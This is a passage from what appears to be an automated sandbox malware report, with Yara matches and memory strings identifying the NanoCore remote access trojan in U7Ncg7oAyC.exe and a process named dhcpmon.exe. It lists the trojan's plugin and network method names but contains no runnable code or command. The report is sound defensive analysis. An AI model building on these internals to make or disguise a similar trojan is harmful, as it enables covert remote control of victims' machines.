        Source: Yara matchFile source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.422202899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.450934240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.420827923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.419127267.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.423439487.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.453640867.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6284, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6752, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 2860, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5308, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5256, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6568, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 640, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: U7Ncg7oAyC.exe, 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: U7Ncg7oAyC.exe, 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: U7Ncg7oAyC.exe, 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: U7Ncg7oAyC.exe, 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: U7Ncg7oAyC.exe, 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: U7Ncg7oAyC.exe, 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: U7Ncg7oAyC.exe, 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: U7Ncg7oAyC.exe, 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: U7Ncg7oAyC.exe, 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: U7Ncg7oAyC.exe, 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: dhcpmon.exe, 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
